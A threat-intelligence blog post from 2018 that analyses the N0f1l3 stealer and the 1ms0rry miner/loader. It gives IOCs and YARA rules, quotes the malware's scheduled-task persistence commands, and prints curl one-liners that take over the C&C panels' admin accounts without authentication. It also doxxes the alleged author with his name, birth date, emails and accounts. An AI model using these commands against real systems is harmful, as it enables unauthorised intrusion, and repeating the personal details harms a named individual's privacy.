benkow_: Sorry. Not sorry 1ms0rry. Atsamaz Gatsoev malware business

dimanche 8 avril 2018

Sorry. Not sorry 1ms0rry. Atsamaz Gatsoev malware business

Hey!
Here we go for another write up, but this time with some friends :D
Greetz to .sS.!, coldshell, fumik0_, siri_urz, VxVault, Cybercrime-Tracker, .sS.! (again).

This post is a quick reminder for the "malware reasearcher" :

Developing malware and selling them is lame and illegal.

Introduction

In this blogpost, we will try to present you another malware actor called 1ms0rry. This guy managed to make itself known by selling a password stealer called N0f1l3 in some hack forums, and maybe you recognized him to be the man behind the miner "1ms0rry-Miner", which is pretty active in the wild these months.

1ms0rry was selling builders or/and source code for his malware.

There is a huge probability that almost all the C&C are controlled by customers and not 1ms0rry himself.

This write-up is exclusively about this malware developer, not botmaster(s).

Malware Zoo

N0f1l3

The selling ads (RU/Google translate)

The malware

The first one is a malware called N0F1L3. Spotted on some forums sold for 20$ the build or 600$ for the source code.
This password stealer was developed for stealing:

Browser passwords and cookies (Chrome, Opera, Kometa, Orbitum, Comodo, Amigo, Torch and Yandex)
Crypto-Currencies wallets (btc, electrum, ltc, eth, bcn, DSH, XMR, ZEC)
Filezilla passwords
Every file on the desktop with the extensions .txt .doc .docx .log

This malware is developed in .NET

Files artefacts:

%TEMP%\Directory\Browsers\Passwords.txt

%TEMP%\Directory\Browsers\Cookies.txt

%TEMP%\Directory\Browsers\CC.txt

%TEMP%\Directory\Browsers\Autofill.txt

%TEMP%\[HIWD].zip

Directories:

%TEMP%\Directory\Files\Desktop

%TEMP%\Directory\Files\Filezilla

%TEMP%\Directory\Wallets\BitcoinCore

%TEMP%\Directory\Wallets\Electrum

%TEMP%\Directory\Wallets\LitecoinCore

%TEMP%\Directory\Wallets\Ethereum

%TEMP%\Directory\Wallets\Bytecoin

%TEMP%\Directory\Wallets\Monero

%TEMP%\Directory\Wallets\DashCore

Notice that there is no persistence even in the source code published or in the sample in the wild.
In some sample we found this pdb:
C:\Users\gorno\Documents\Visual Studio 2015\Projects\ims0rry\ims0rry\obj\Release\n0f1l3.pdb
this path is the 1ms0rry's computer we will understand why later.

The interesting fact here it seems that this stealer is targeting Russian browser too.
It focus on browsers like Yandex and this one is not really used outside Russia.

The C&C

The login page:

The collected logs list:

Each collected log appears in a separated html file:

Minimal settings:

And a search engine:

The panel is simple but efficient.

Vulnerabilities

Since the panel has leaked almost everywhere, and the new versions are patched, let's have a view on the vulnerabilities available.
You can easily change the admin password.
If you look at the first lines of cmd.php (the gate):

You just need to send a POST requests with 3 parameters without authentication for changing the password

curl -i -X POST -d 'login=admin&password=lulz&change=1' http://n0f1l3cnc.com/cmd.php --header "Referer: http://n0f1l3cnc.com/settings.php"

The panel also have some unauthenticated iSQL

IOCs

PDB related:
C:\Users\gorno\Documents\Visual Studio 2015\Projects\ims0rry\ims0rry\obj\Release\n0f1l3.pdb
C:\Users\gorno\Documents\Visual Studio 2015\Projects\n0f1l3v2\Release\Test.pdb

CNCs and associated samples:

manganic-rumbles.000webhostapp.com
40cfb089f9e02a6038177cbec830f387622f5e2b268797682f67a56c303abee

tokar222.000webhostapp.com
b1def07459fbc7d417430edf70330e15ad8a775be00d8ccecd25ff240bd00884

ih871411.myihor.ru
2fdf25b8518afd461969fae0dded14500fc6a53dfe231eb8ceb7982a31df604c

9ville.000webhostapp.com 
46483f88191566a4317d79f27f7a289e3503537ee9e1007661864df82ccc8338

lmdlm.xyz 
0604de5851a210255b1314430b421573c19c374476260fc96de8924fab332581

jwad0w.000webhostapp.com
28a076ab9282cc2276e84ae3894d64e42af7a9deb26f0b575e526cd01196678b

iden1930.000webhostapp.com
Demo panel

Yara:

  rule n0f1l3: N0F1L3
{
        meta:
        description = "N0f1l3 Stealer"
        date = "2018-04-06"
        author = "coldshell"
       reference = https://benkowlab.blogspot.com/2018/04/sorry-not-sorry-1ms0rry-atsamaz-gatsoev.html
    
    strings:
        $mz = {4D 5A}
        $string1 = "\\Passwords.txt" 
        $string2 = "\\Cookies.txt"
        $string3 = "\\CC.txt"
        $string4 = "\\Autofill.txt"
        $string5 = "\AppData\Local\Yandex\YandexBrowser\User Data\Default\Login Data"
    $mz at 0 and all of them
    }

N0f1leV2

we found a N0F1l3v2 in the wild
This sample was injected in a malware cryptor named "Paradox Crypter"

This cryptor is injected by c9a87d68a65ade147208ac8a6d68297877f145285e3f3f40ec01ea8d562fadc9 :
C:\Users\gorno\Documents\Visual Studio 2015\Projects\n0f1l3v2\Release\Test.pdb
What's new in the v2? It's now in C++, the stealer also support Firefox for the other part it's just N0f1l3 :)

1ms0rry Miner

Here we go for the 2nd malware, this is a Loader + Miner.
The selling ads (RU/Google translate)(click to enlarge):

Prices:

CPU version - 3000 rubles
GPU version - 3000 rubles
EXTENDED version - 5500 rubles
PRIVATE version - from $ 2000 (discussed individually)
MULTIACC version - 40 000 rubles / month
SOURCE - 200 000 rubles
Bitcoin-purse substitution module - 500 rubles
Module stellera with admin panel - 2500 rubles
Resale of licenses is strictly prohibited (starting from 19.01.2018)

LoaderBot

Loaderbot is developed in .NET and it reuses a lot of code from N0f1l3.
It have basic features.
It kills itself if the task manager or process hacker are launched ("Hides from the task manager, process hacker (absolutely no processes)" feature in the ad).

The malware installs itself in C:\users\%userprofile%\AppData\Roaming\Windows\
Persistence is done by:

Scheduled task: "cmd", "/C "+"schtasks /create /tn \System\\SecurityServiceUpdate /tr %userprofile%\AppData\Roaming\Windows\" + currFilename + " /st 00:00 /du 9999:59 /sc daily /ri 1 /f;
Registry: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
A .url file pointing to URL=file://path/to/the/malware

Available features:

Update
Download
Execute

Connexion to the C&C is done by GET requests http://cnc.com/cmd.php? :

hwid: Used as bot ID (VolumeSerialNumber)
timeout: timeout in case of CNC failure
completed: task ID completed

Using the User-Agent "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0"

So, before infecting the victims with a Miner, the attacker install this loader.

Miner

The .NET loader drop a miner developed in C++
The first stage install the final miner:

copy to %userprofil%\\AppData\\Roaming\\Microsoft\\Windows\\winhost.exe
launch a scheduled task schtasks /create /tn \\System\\SecurityService /tr %userprofile%\\AppData\\Roaming\\Microsoft\\Windows\\winhost.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
Hide the installed files via attrib +s +h
Looks if taskmgr.exe or processhacker.exe are running
Detect if a Wallet address is in the clipboard and if so, replace it
Use RunPE to lauch a fake attrib.exe (final miner). RunPE is done via CreateProcessA(Suspended)/SetThreadContext/WriteProcessMemoryResumeThread/. This code is a copy paste from https://github.com/KernelMode/RunPE-ProcessHollowing

The final payload is a C++ miner based on xmrig:

The C&C

Workers (hi IPv6 :) ):

Tasks:

Settings:

The admin C&C/Market

When 1ms0rry has developped the Miner, he also has developped a backend called SorryCoin.
This panel is used by him and his resellers for building samples and support purpose.
Here you can see 1ms0rry showing sorrycoins and asking for new resellers :

Panel Instructions:

Информация о панели
 
Личная статистика
Личная статистика пользователя создана для удобства слежения за своими достижениями и прогрессом.
В ней будут отображено: общее кол-во сделанных билдов, кол-во продаж, кол-во рекриптов/чисток/выданных обновлений,
ваша должность, дата регистрации, кол-во заработанных денег, кол-во покупателей в черном списке и ваши SorryCoins
 
SorryCoins служат для определения вашего КПД в команде. За каждую чистку/рекрипт/обновление/продажу вам начисляется 
определенное кол-во монет. Каждый месяц каждый участник команды будет получать от меня премию, равную кол-ву 
его монет.

Билды
Основная страница. Служит для создания билдов майнера и бота. Необходимо заполнить поля: Пул, кошелек от пула 
(к примеру майнергейта - www@mail.ru), пароль от пула (обычно x), логгер (ссылка для сбора айпи, если не нужен, 
можно указать что угодно если поле не нужно), ссылка на админ-панель (на cmd.php файл,можно указать что угодно 
если поле не нужно), биткоин кошелек подмены (для стиллера биткоинов, можно указать что угодно если поле не нужно),
цена (полная сумма,которую оплатил клиент), примечание (можно написать что угодно если поле не нужно),
тип билда и версию, которую приобрел покупатель После создания заявки вам необходимо подождать пока статус вашего 
билда не изменится с queue (очередь) на done (сделано). Далее перейти по ссылкам, скачать файлы и передать клиенту
Расценки
Во вкладце "Расценки" опубликованы официальные цены на продукты и информация о вашем доходе с продажи каждого.
 Они могут изменяться, так что проверяйте раз в день.
Общая статистика
В общей статистике будет отображен прогресс всей команды. Это: общее кол-во билдов, продаж, 
рекриптов/чисток/обновлений, участников команды, заработанных денег, покупателей в черном списке
Материалы
В этой вкладке опубликованы самые последние материалы для майнера, информация о версиях майнера, бота и стаба.
Черный список
Раздел создан для удобства общения с клиентами (сарказм). Если вы кому-то отказываете в поддержке, необходимо 
внести данного клиента в базу и написать его контакты, никнейм и причину отказа.
Лог посещений
Страница, доступная только админу. Отображает логи посещений пользователей. Позволяет выявлять шэринг аккаунта.
Пользователи
База пользователей (команды) в которой можно отследить прогресс других участников
TODO
Список того, что нужно сделать. Удобно, если вам нужно что-то записать. Для каждого индивидуальная записная 
книжка - никто другой не сможет ее посмотреть.

Google translate:

Panel Information
Personal stats
The personal statistics of the user is created for convenience of tracking of the achievements and progress.
It will display: the total number of builds made, the number of sales, the number of recs / purges / issued updates,
your position, the date of registration, the number of earned money, the number of buyers in the black list and your SorryCoins
SorryCoins serve to determine your efficiency in the team. For each cleaning / precription / update / sale you are credited
with a certain number of coins.
Each month each member of the team will receive from me a bonus equal to the number of his coins.
Builds
Main page. Serves to create a Miner and Bot build. You need to fill in the fields: Poole, purse from the pool
(for example, minergate - www@mail.ru),password from the pool (usually x), logger (link for collecting ip,
if you do not need it, you can specify anything if the field is not needed)
link to the admin panel (on the cmd.php file, you can specify anything if the field is not needed),
bitcoin substitution wallet (for the bitcoin styler, you can specify anything if the field is not needed),
the price (the total amount paid by the client) note (you can write anything if the field is not needed),
the build type and the version purchased by the buyer
After creating the application, you need to wait until the status of your build changes from the queue on done.
Next go to the links, download the files and send to the client
Pricing
In the "Prices" tab you can find official prices for products and information about your income from the sale of each.
They can change, so check it once a day.
general Statistics
The overall statistics will show the progress of the whole team. This: the total number of builds,
sales, recs / purges / updates, team members, earned money, buyers in the blacklist
Materials
In this tab the most recent materials for the miner, information about the versions of the miner, bot and stub are published.
Black list
The section is created for convenience of dialogue with clients (sarcasm). If you deny support to someone,
you need to enter this customer into the database and write his contacts, nickname and the reason for the refusal.
Log of visits
Page, accessible only to the administrator. Displays the logs of user visits. Allows you to identify account sharing.
Members List
Database of users (teams) in which you can track the progress of other participants
TODO
A list of what needs to be done. Convenient if you need to write something down.
For each individual notebook - no one else will be able to see it.

Panels Overview:

Vulnerabilities

As usual, code reuse = vuln reuse. The admin account takeover is still her:.

 
curl -i -X POST -d 'login=admin&password=mypass¬e=&type=admin&useradd=1' http://S0rryCoinCnC/cmd.php --header "Referer: http://S0rryCoinCnC/users.php"

IOCs

PDB related:
C:\Users\gorno\Documents\Visual Studio 2015\Projects\GPULoader\GPULoader\obj\Release\GPULoader.pdb
c:\Users\User\Desktop\[NEW] builder\Bot\Miner\obj\Release\LoaderBot.pdb
c:\inetpub\wwwroot\Bot\Miner\obj\Release\LoaderBot.pdb
C:\Users\gorno\Desktop\RelWithDebInfo\xmrig.pdb
C:\Users\gorno\Desktop\[NEW] builder\Miner\Release\winhost.pdb
c:\Users\gorno\Desktop\[NEW] builder\Bot\Miner\obj\Release\LoaderBot.pdb

CNCs and associated samples:

ih753479.myihor.ru
b25c3eda59e0014df05c9aa4451ab09c2153ddb919e105a693f1f8923e465157

ih894017.myihor.ru
e61d08bea42a6d2d49819e81e18b76db4413a1d80abeac8d8f8a75f18b940b24

ih895435.myihor.ru
867e605f0dc7d8e5aa62a9db99ebc8f12b1c09713707298c3c70e0294d14ebb7

ih903818.myihor.ru
a8c7f6dbc844a2b8b10e1751f65453b20392fa82caa9e83fcce3c496b3021fba

sawerticq.myihor.ru
45cec8803dd773469012d80afd3abf3eaf9a8f8b938a03ce8e52c2cba6dd28d2

pokerhot.ru
22fdc1c82acda24c3684f0cdc53128e6f24c32c564e0e8f0488d4d0f55ee7f2c
f448e4d1d52f46ab79ddf77f93fb28324439c2441c399d4224a570d87c1b556d
f3d8e6abc1b725b5bf73cf8ed39b517f00fd46e65dfa23432ec7119d4d3b4d64
d8287fd95435c00ef70c162a9bfd9b359e43d3b75cb764d5ec5b1d545b3f2133
0c0d58b488dafcfb632a7e020ceef22f95e68f9e6c55036f0a2f0b816da40bd1
95f89b82eda0548b93a0d62fb73446d32bdaa83d9d6ae4906a927d3e903e99e7
45551ae1c8cb97fe51b826f3f740ebcfd8ef061f14bcf458eeb2176b2d826050
aa9f2b763d3eebf6060e6b41c56520b2fd66fca87789dd6528703dcd33b67567
17ead882b04f22054b6ee06bf04e7b64eb7289a5c7f01f9faff397dad50287c6

ivanvarb.beget.tech
6de67141c7602544ca75cab06d840716d8eec9474bd744b39aa0f071b44ad16f
2e57dc399aeb974b12e299a042ae051ab09c039794dfc495b99e76f8a5aeb4bc
830bc74e10ac5a9baf6461081eed5496dc293145d184a10c60303b5f289835b6
8460ae8685964f1922dc1cbe1e19f6714d41b801487da647a6c6bea3ded3ac2c
600d00bb9b94b1164670c3e210271ba1623b9f44da681f66a8235e6c8e553470
3c44f07a1930bdcceae1bd01138a71fc2c9bf87138dc324477dbe39b9ae01bc0
a358e56c91218b5f21d54556fb7aef5de158da4764c9cf8e5d71e3e41ff4841f
49cb77361d08c86faf572829baa1ba06a7581254ddc45f074d67f72852c64152
195b79a3ee7275081aa538ba2e619864d9504c5bce6744334cfca5c5990fd1d2
26188b4be138b3bb3bef2d3a0eb98fbba83020f09bde0b2da4ee92f2c887df9c
5d286edf2f49dc61a3f70e6c25e13d92ae36f284b9b27440cc8f5bcd0084662e
2d98bd04d906c6600b6c2a1cf4ef2f60a2af1656b1a6f8b01913bd6d157a87b4
4d646cfc9cc82420a8d4028989322fb006eba07400ee4705f91fe1604cbe1513
b3648a2dbed0e1833b3278729c210144145696fd908aad3a4e991ef566d6d903
4c25f0f6a78b5bf7cb047446a458154cbbdf522c2bdea3daf2682eed168c7814

krasotka-kuphino.ru
2b099e9ab15b5056b0e4b09ea5751ecb76ebce1b02251c4a23fc133ea04918ee
81660ecc8467a284b689afdc3b60b5faa73b2a8385c57000e6c19f05944cf714
e5ecf75fe7991a351e52d64d14e6fb96c9d6eec7f5a0ccc64ea67753be03714a
6fa7da5f3026074b6c2a4b98865175f024941057a8c55d5516797f928a737195

panel.enable.pw
aa5037e15d6c2ea27fff9726cc3951660490273726edc9510a5e78d0afb82e68

t3h1337.se 
76a811884030d751efac2ede5d5f8cb75bd2d72e7dee1327005838b5f08a8b28
d50a5373add2eb3e94a7b341781a3b09521e5c13387ace7f73995fe810c287ff  
f31a16510da94c57ca0864562186a69540c5f2024f15d6d2eabd21f2a847fabc  
66370e465351ce5da550f34afd0e03ff91fb906f077412a4c3f3c40a74c67e21  
b037861cb7b32607f917146c2dc8e67109b9389ff1e2808c10681e7a953dd85c 
0e346d3f905acff6aa5fe1479b7ce9a5957312838061620f624749d8ddb1e180
cbbce47b73a43b76c501717cd99243e2cbc226184e9828ca7887ac7d38fe5099 
f11e1379b1d1f74d6ef738841eba0b7c125c8717f6411ce5cf12e695caf028c4
e3f5668ed13b860d5b90e3c9e99015ecef8985343ab4057c83fce3f8bc119bc8
4f443a5c0189878a20e9fe59642bc68c4d78c7ee4cd6a1f1e35fff25600fafb4
974a28dd21a0a25393180e9abf656d4e2583422c5d1102aeca7d839de29f10ac

cq95452.tmweb.ru
f80742032ff611f7e569f4f9b1d879377f81a3ae2a85e0234c161de5122058b0
2cfa2019f3002c7ea1f9cb1555caa5b84554f68e1cd54a436c9aa67a9359286f

uomomo.tmweb.ru
eb7d44264bc83c2f77958342aede1d2d266ee53380295ce9fd3e3630780031c9

67864.prohoster.biz
cd2874a83ca324eebbeaa134330d667aee72d28ded20bd44d4d48c91ce6474b1

109.234.36.233
a80038832522f8a4a0d5bfba7755ac73d506a0c523e8f86a4d7ae2dc798c0937
c577a5ddbdf85ab2a168223d80981cf1d835f15dbf0437cc43b5801cc37010a6
61d75bf9a006dcfea78e0c792cc4db7b0de82cd847d30680be08c463eaaf643f

sorry.enable.pw
2d6e94a539f89b3dfc3c8ced8ca7facf3840a3706fa6079a9328234133936143

zlives.ru
b0220a121e1daf7fc21f1869ceb4a588a1935ff4a7dbcc8660e8c661f40c26bb
66ce33495863914fee2bc0355d6911b0912150cbad0846721d9cf769858029b5
5da4dbdd3d67abcd38df00aabc4f9a9393751e89c98a08d9ce946c47d1672eff
aa4fd3dc52be981c482d955287c2c13f0b2535e5d351516a49f9150c62a92714
f15a876dcf2b9f226d4b61b847e3d15923cb04d7883a9aef757af3ed3d62f2b6
36e0a614810635c9c3d9091d91f476e1cce822ff6aba34e2f9ecb818faa018cb
3c14574aafdef0e216a289aff47704eb5d1071081594b2740f08a6fe6551dbfe
49755ff17be7bf0510fde970c2a6dd9d033b2b92322ae44b47276c28f7fdc78e
473cc575686c060c86aa5b78128832bdbbe4ce3352ce60a7e9c06dd36383b1b7
7f3e3ff028f521a50f1f8abd6549d092f198836993553e36e05981fe723daae3
ac865ff6cddbd825d459342dc1bbb91bee32cff945e4d717ad956d497acb213a
acf14c531bb5fc391a7a72ddd0e3ce9ea04939b8e6068f3667dc49896ffe90f4
81d51d7659dee946512cae617ea5215e2ca0945200d397052c1d4d137e810481
873bf7726cada94352ae15e5a7520187dfbf33b450131ba41148452f94adfaf9
58447db309ca8ec0090194d03f5fddda89b33ecce60306ea567e394c956caf23
d394e0115fb48be2492cd66f41def6070a0f171149177ad1fb5813d4a531d872

letstrytomoney.000webhostapp.com
79ad0aec7a30a8c3085256a6b36fafdc5448a6392ae79621356e6de6cede90ae
6ab8bbf76641e1f04252f7a8a579b2c7a493cd67452222a08260d3ef827113ff
1f3d0bf4afc4b31c0e1dac027636c0996cc99e474d6b85d68fd7e27c919d34e6

plaza777.co.ua
50587f56bc5cda5c9c49bfe233cea4a6da70207d34506865d215f6f84d75af17

v90327ux.beget.tech
efa35d539608624d3c70210ebd15e4a3103abc3fcbd5e47c76bcb25a10f3aae8

moneyrob.info
b6674acc2314913ad8c8ed14ce50c12b0f6babff3081969d7e2a1ab05f53af96

ce24411.tmweb.ru
c443c08c3071d3842b9cc26bbb34125e0baf894600f56b2aaab4519f488a31f3
294300b8ec1c41d0a0c71283d02bb359f6c9e38db2d630e1ec6087abf763730f
4da1b7cd2e6b5e53f4395eceb2d9180dec678e3c28cdff5ca54bb8526cef4bd8
56f9709e665738fd81d0880c4eecc45e678784880cdb83e9808bbff606d41cc9
a9bdf007c8a31e2034171fdfb20d07a51341e3e4977ef118a9764597d728a0b6
711ec24f2a2d1daff050a10fa3c3f2bf6b86a3ce02e785fe2327836ff2c4c9f1

68054.prohoster.biz
fefedc45386b83926aaa6893121bed424be0e0278319a5d97ee0cb74c7133144

5.200.55.248
karlikvm.beget.tech

61d094a1bd6305aa89193fdf9cb68ece3f28475b10adee1e71b9dfc96d0cb992

Yara:

rule 1ms0rryMiner: 1ms0rryMiner
{
        meta:
        description = "1ms0rry Miner"
        date = "2018-04-06"
        author = "benkow_"
        reference = https://benkowlab.blogspot.com/2018/04/sorry-not-sorry-1ms0rry-atsamaz-gatsoev.html
    
    
    strings:
        $mz = {4D 5A}
        $string1 = "?hwid="
        $string2 = "&completed="
        $string3 = "?timeout=1"
        $string4 = "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0"
        $string5 = "LoaderBot.Properties.Resources"

    $mz at 0 and all of them
    }

Misc

TImeline: (click to enlarge)

Attack vectors

Some campaigns using 1ms0rry malware:

Fake fonts: https://www.malware-traffic-analysis.net/2017/11/27/index.html or https://www.malware-traffic-analysis.net/2017/11/12/index.html

Fake Flash installer : https://www.malware-traffic-analysis.net/2018/01/02/index2.html

>https://www.hybrid-analysis.com/sample/e6aeef24c04a1d327e9b8337ca50c74f686ca041ac161a130ca31003ceaaaa7e?environmentId=100 : This sample is really interesting.

The infection chain is :

github.com/vaio666999/2/blob/master/GoogleUpdater.exe << LoaderBot :: sorry.enable.pw/cmd.php?hwid=24C2B6A0
github.com/vaio666999/2/raw/master/GoogleUpdate.exe << Rarog :: api.enable.pw/2.0/method/checkConnection 
github.com/vaio666999/2/raw/master/xmrig32.exe User-Agent: Mozilla/5.0 (Windows NT 6.1) Rarog/5.0
xmrig32.exe -o xmr.pool.minergate.com:45560 -u stasmiomi@gmail.com -p x -k -t 1

61d094a1bd6305aa89193fdf9cb68ece3f28475b10adee1e71b9dfc96d0cb992 is Rarog

Backdoored software:

efa35d539608624d3c70210ebd15e4a3103abc3fcbd5e47c76bcb25a10f3aae8 - RDP Bruter
76a811884030d751efac2ede5d5f8cb75bd2d72e7dee1327005838b5f08a8b28 - WinDjView setup
c9a87d68a65ade147208ac8a6d68297877f145285e3f3f40ec01ea8d562fadc9 - Paradox Crypter

Competitive analysis

This actor is really active on his GitHub. Thanks to him, this is a gold mine to have some information about what is going on seller forums. He decompiled a bunch of malware and analyzed them on telegra.ph and pushed all sources on his repository. This is a good way for him to check if there is no copycat for his miner. For example, when he analyzed a miner developed by EvilBanana. He mentioned that is a bad copy of "his" miner explicitly :

the highlight sentence means "this miner turned out to be my miner of the first version, but it's a little broken for some reason"

He reviewed some diversity of malware/tools (miners, botnet, loaders...) and tried to explain if features were really well developed and effective, or it's just basic crappy stuff..

Reviews are available there :

http://telegra.ph/Analiz-skrytogo-majnera-ot-Dzotra-12-31

http://telegra.ph/Analiz-botneta-DarkSky-12-30

http://telegra.ph/Analiz-skrytogo-majnera-ot-Hostis666-12-20

http://telegra.ph/Analiz-skrytogo-majnera-ot-GucciMine-12-05

http://telegra.ph/Pishem-kejlogger-na-C-12-07

http://telegra.ph/Analiz-skrytogo-majnera-ot-Proga-12-10

http://telegra.ph/Analiz-skrytogo-majnera-ot-Eduard1337Vans-12-10

http://telegra.ph/Pishem-nerezidentnyj-RunPE-loader-na-C-12-12

http://telegra.ph/Analiz-skrytogo-majnera-ot-EvilBanana-ims0rry-12-25

http://telegra.ph/Pishem-miniatyurnyj-HTTP-flooder-na-Python-3-12-28

http://telegra.ph/Analiz-skrytogo-majnera-ot-Hawksh-01-01

http://telegra.ph/Pishem-DDOS-bota-na-C-CHast-1-02-04

http://telegra.ph/Analiz-stillera-ot-xZist-01-06

http://telegra.ph/Pishem-loader-s-avtoudaleniem-na-C-01-09

http://telegra.ph/Analiz-majnera-ot-EgorSa1dy-02-22

Forks

Some Fork example:

FelixHTTP (N0f1l3 fork):

Ref:
https://twitter.com/siri_urz/status/974205197407932416
40089ea9af2c1191fd9dfec5c49d1c37809b9eae8609bcaa810346e81ca3384a
freexmr.ru

BUMBLEBEE MinerPanel:

Ref:
https://twitter.com/malwrhunterteam/status/956155159469608960
ih803741.myihor.ru

EnlightenedHTTP

Ref:
https://twitter.com/ViriBack/status/962051515526520832
179.43.147.227/mine/
v90327ux.beget.tech
1754d64016c758a65cb85df328ffd502a7255a6855d976e3bdeb497f95201848

Evrial

Evrial (https://www.bleepingcomputer.com/news/security/evrial-trojan-switches-bitcoin-addresses-copied-to-windows-clipboard/) use code from 1ms0rry for sure:

Who is 1MS0RRY ?

Now let's try to understand who is 1ms0rry.
We know that he as :

a Twitter account: https://twitter.com/ims0rry_off

a Telegram account: https://t.me/ims0rryblog

a Github account: https://github.com/ims0rry/

Let's try to get the nickname and the email used to commit in the Github account.

This command gives us (full details in the annex section):

gornostay322@mail.ru
lordatsa@mail.ru
your_email@whatever.com

with the nicknames:

Gatsoev
hype
ims0rry
s0rry
Your Name

lordatsa@mail.ru give us a mail.ru account https://my.mail.ru/mail/lordatsa/photo

We now have a name Аца Гацоев (Atsa Gatsoev)
All these information help us to find this Weblancer profile: https://www.weblancer.net/users/hypega/

This profile is interesting because:

the name Ацамаз Гацоев (Atsamaz Gatsoev) is the same as the mail.ru account
The username used is hypega. hype was used to commit on github, hypega for "hypeGatsoev
The personal website in the profils information is http://lordatsa.wix.com/gatsoevsummary lordatsa is used as username for mail.ru

http://lordatsa.wix.com/gatsoevsummary is also interesting:

VK Account: https://vk.com/quiet_and_invisible
G+ account: https://plus.google.com/u/0/109976643017066209762/posts/p/pub

the VK account looks down but the photos in the G+ account points to 1ms0rry again:

The G+ account allows us to switch to the related Youtube account:

Now, take a deeper look at this video https://youtu.be/zPRo3hkVbrQ?t=4

This directory [NEW] builder on the desktop reminds us LoaderBot pdb :
c:\Users\gorno\Desktop\[NEW] builder\Bot\Miner\obj\Release\LoaderBot.pdb

In https://youtu.be/KUvLk20-NZk?t=6 at 6sec we can see Thermida and a local path C:\Users\gorno

In https://www.youtube.com/watch?v=KUvLk20-NZk at 1 sec we can see the viruscheckmate user wich is hypega (again)

His freelancer account is interesting too, https://freelance.ru/hypega.
it allows us to retrieve 2 links:
* A Portfolio website: lordatsa.wix.com/e-consultant (via https://freelance.ru/hypega/elektronny-konsultant-2810410.html)
* A GitHub account: github.com/Gatsoev/Nerve_MobileApp (via https://freelance.ru/hypega/pr-agent-2966193.html)
This Github account is a perfect proof.
Let's take a look a for example https://github.com/Gatsoev/csgo.tm-fakeSellExtension.

Curious isn't it ? It looks like the Github account was just renamed.
We now have enough proof for linking 1ms0rry to Ацамаз Гацоев / Atsamaz Gatsoev

Who the hell is Atsamaz Gatsoev? We can find a protential picture of him in his weblancer profile :

Confirmed by Alan Salbiev from Education Ministry on a Facebook post.
Alan Salbiev describes 1ms0rry like that:

Google translate:

Atsamaz Gatsoev.
11-grad student from Vladikavkaz.
He ran and published in his blog theme more than 20 research papers in the field of information security, in particular, virology,
namely: analysis of protection and opening of various vredosnogo software, methods of cyber attacks and protecting against them.
Over 1,400 people signed it.
December 2-3, 2017 in Vladikavkaz was held the first hackathon among high school students for the prize of the Head of the Republic
in which Atsamaz acted as a mentor.
Atsamaz he organized and conducted twice a thematic Olympiad on CTF (Capture the flag) of information security in the format Task-based,
which was attended by over 100 people from different cities and countries.
In addition, with the direct participation Atsamaz (design, commissioning and start-up) in the work of our Office has been implemented
application based on the principles of distributed data registry (blokcheyn - technology)
February 25, 2018 at competitions on sports hacking at the University ITMO our hero confidently walked rivals from Komsomolsk-on-Amur,
Khanty-Mansiysk, Penza, Pyatigorsk, etc. As a result, a schoolboy from Vladikavkaz entered the top 15 in St. Petersbur>.
At Atsamaz there is a dream - to enter the University of ITMO. Our Office will provide every possible assistance to a talented guy.
Special mention should be noted that the successes Atsamaz lies the great work of his parents, who were able to instill in him the
awareness, independence, the desire for knowledge and hard work. Take an example from them.

It's easy to protect against malware when you develop them, isn't it ?
TL;DR:
(We only keep information related to his malware activities.)

Name: Ацамаз Гацоев, Atsamaz Gatsoev,
Born: 1997 Aug. 14
Location: Tskhinvali region
Nickname: 1ms0rry, gorno, hypega, Gatsoev, lordatsa, atsam;
Email: lordatsa@mail.ru gornostay322@mail.ru
Social: https://vk.com/quiet_and_invisible https://twitter.com/ims0rry_off https://github.com/ims0rry/ https://plus.google.com/u/0/109976643017066209762/
There is enough information for knowing exactly who is 1ms0rry :)

Conclusion

Obviously, this write-up doesn't cover every malware (you can find some telegra.ph bot) but it's enough data if somebody needs to go deeper.

This is not a major threat actor, malware developed by him are not really advanced and the web panels are basic (except the design !) but the SorryCoin backend was interesting.
It is obvious that here, Ацамаз Гацоев is a malware developer/reseller and not a researcher or a red-teamer that develops malware for POC purpose.
Just in case of, we archived all the links (forum, twitter, telegraph...) on archive.org :).
That all folks!
We hope you enjoy the read if you need more information don't hesitate to ping us
Thanks again to MalwareMustDie and sS.! for the awesome work and greetz to NibbleHunter

Annexe

Github Information

Commit nickname:email by repository

lordatsa mail address:


Hawksh-miner/CPU PUBLIC/CommonRes/32_unpacked_.au3: 
Run("Cheking.exe -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u 
     lordatsa@mail.ru" & $rand & " -p x " & $threads, "", @SW_HIDE)

Different user path found on the Github

1ms0rry posts